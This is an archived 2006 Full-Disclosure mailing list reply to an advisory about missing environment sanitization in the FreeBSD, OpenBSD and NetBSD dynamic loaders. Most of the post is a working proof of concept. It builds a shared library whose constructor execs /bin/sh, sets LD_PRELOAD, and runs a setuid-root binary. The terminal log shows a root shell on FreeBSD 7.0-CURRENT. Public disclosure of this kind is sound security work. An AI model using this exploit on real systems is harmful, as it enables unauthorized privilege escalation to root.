lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed, 22 Nov 2006 23:04:12 +0100
From: "Tyop?" <tyoptyop@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Lack of environment sanitization in the
	FreeBSD, OpenBSD, NetBSD dynamic loaders.

On 11/22/06, Tyop? <tyoptyop@...il.com> wrote:
> On 11/22/06, In Cognito <defend.the.world@...il.com> wrote:
> > Impact:  Serious. May lead to privilege escalation.
> >
> > A class of security vulnerabilities has resurfaced in the dynamic loaders
> > of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment
> > variables for suid and sgid binaries.
> >
> > Due to either badly implemented sanitization or a lack of it, a setuid
> > binary may execute other processes with a tainted environment.
> >
> > [...]
> >
> > Have fun! Stay safe!
> >
>
>
> Fun. Not "perfectly" safe.
>
> My experience :
>
> %id
> uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
> %cat vuln.c
> main()
> {
>   setuid(0);
>   execl("/usr/bin/id","id",0);
> }
> %cc vuln.c -o vuln && chmod 4711 ./vuln
> %exit
>
> > id
> uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
> > ls -l vuln
> -rws--x--x  1 root  tyop  4827 Nov 22 22:46 vuln
> > cat tyop.c
> __attribute__ ((constructor)) main()
> {
>   printf("[+] Hello from shared library land\n");
>   execle("/bin/sh","sh",0,0);
> }
> > cc -shared -o lib.so tyop.c
> > setenv LD_PRELOAD "/home/tyop/test/lib.so"
> > ./vuln
> [+] Hello from shared library land
> # id
> uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
> # echo "It works on `uname -sr`"
> It works on FreeBSD 7.0-CURRENT-200609
> #
>
> Have a nice day.

# echo "It works with vuln static too"
It works with vuln static too.
(sry for double post)

-- 
Tyop?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists